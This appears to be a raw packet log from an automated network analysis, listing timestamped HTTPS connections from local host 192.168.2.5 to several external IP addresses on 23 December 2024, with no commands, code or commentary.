                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298592091 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298650980 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298671007 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298712015 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298722029 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298747063 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298763037 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298777103 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298810005 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.299144983 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.327651978 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.327814102 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.327862024 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.327908993 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.328020096 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.328056097 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.328382015 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.375341892 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.382831097 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.383003950 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.383078098 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.383099079 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.383251905 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.383296013 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.385175943 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.385351896 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.385507107 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.385543108 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.385562897 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.385751963 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.385799885 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.385799885 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.405853987 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.405987978 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.406097889 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.406152964 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.407871008 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.408858061 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.408875942 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.408921003 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409142017 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409179926 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409271002 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409275055 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409298897 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409310102 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409343958 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409431934 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409470081 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409543037 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409567118 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409584999 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409596920 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409614086 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409632921 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409727097 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.539062977 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.539120913 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.539171934 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.539205074 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.539222956 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.569716930 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.569819927 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.569948912 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.569983959 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.569984913 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.569984913 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.570005894 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.570070028 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.570183992 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.570221901 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.570252895 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.570373058 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.570861101 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.570888042 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.570902109 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.571028948 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.571046114 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.611291885 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.611382008 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.611510038 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.611552954 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.611562967 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.611625910 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.611670971 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.611700058 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.641613007 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.641676903 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.641803026 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.641844034 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.641844988 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.641868114 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.641920090 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.642044067 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.642115116 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.642136097 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.642262936 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.642306089 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.642306089 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.665692091 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.665894032 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.666047096 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.666119099 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.666119099 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.666145086 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.666282892 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.666316986 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.666336060 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.667012930 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.677165031 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.603009939 CET50033443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.603049040 CET4435003320.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.603558064 CET50033443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.603822947 CET50033443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.603828907 CET4435003320.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.606065035 CET50034443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.606091976 CET4435003420.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.606214046 CET50034443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.606682062 CET50034443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.606694937 CET4435003420.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.783158064 CET4435002794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.783221006 CET50027443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.783996105 CET50027443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.784004927 CET4435002794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.785799026 CET50027443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.785804033 CET4435002794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.455612898 CET50035443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.455652952 CET4435003520.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.456244946 CET50035443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.456485033 CET50035443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.456502914 CET4435003520.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.600533962 CET50036443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.600645065 CET4435003620.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.600795984 CET50036443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.382771969 CET44349958172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.382940054 CET49958443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.383738995 CET44349957172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.383805037 CET44349957172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.383904934 CET49957443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.410851955 CET4435004494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.410919905 CET50044443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.411331892 CET50044443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.411345959 CET4435004494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.412954092 CET50044443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.412961960 CET4435004494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.444344044 CET44349960172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.444405079 CET44349960172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.444574118 CET49960443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.447654963 CET44349959172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.447792053 CET44349959172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.447891951 CET49959443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.197782040 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.197860003 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.197860003 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.197906017 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.198705912 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.198728085 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.276096106 CET4435004494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.276170015 CET50044443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.276175022 CET4435004494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.276232958 CET50044443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.277091026 CET50044443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.277116060 CET4435004494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:48.087882996 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:48.087924957 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:48.088001966 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:48.088191032 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:48.088205099 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:48.502295017 CET49960443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:48.502315044 CET44349960172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:48.502360106 CET49959443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:48.502396107 CET44349959172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.483932972 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.484030962 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.487196922 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.487227917 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.489367008 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.489384890 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.489514112 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.489547968 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.489670038 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.489706039 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.489844084 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.489886045 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.489994049 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.490014076 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.137335062 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.137423992 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.137455940 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.137484074 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.137739897 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.137754917 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.214982033 CET50067443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.215028048 CET4435006794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.215105057 CET50067443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.215332031 CET50067443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.215346098 CET4435006794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:52.619065046 CET4435006794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:52.619149923 CET50067443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:52.619600058 CET50067443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:52.619628906 CET4435006794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:52.621496916 CET50067443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:52.621512890 CET4435006794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.532438040 CET4435006794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.532510996 CET4435006794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.532515049 CET50067443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.532556057 CET50067443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.532748938 CET50067443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.532764912 CET4435006794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.533999920 CET50076443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.534033060 CET4435007694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.534248114 CET50076443192.168.2.594.130.188.57
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.524291039 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.524322033 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.524349928 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.526829004 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.528791904 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.528837919 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.528915882 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.539891005 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.540671110 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.584170103 CET44351560172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.769136906 CET44351560172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.769206047 CET44351560172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.769237041 CET44351560172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.769265890 CET44351560172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.771361113 CET44351560172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.771398067 CET51560443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.771622896 CET51560443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.778012991 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.780659914 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.784214973 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.785829067 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.786164999 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.791059971 CET44351560172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.792282104 CET44351560172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.792438984 CET51560443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.843750954 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.899755001 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:32.085074902 CET44351560172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:32.112780094 CET51560443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.223045111 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.223215103 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.235449076 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.235631943 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.538877964 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.539716959 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.539963007 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.540132046 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.541153908 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.541455030 CET57034443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.551172018 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.552021980 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.552149057 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.582987070 CET54586443192.168.2.5172.64.41.3
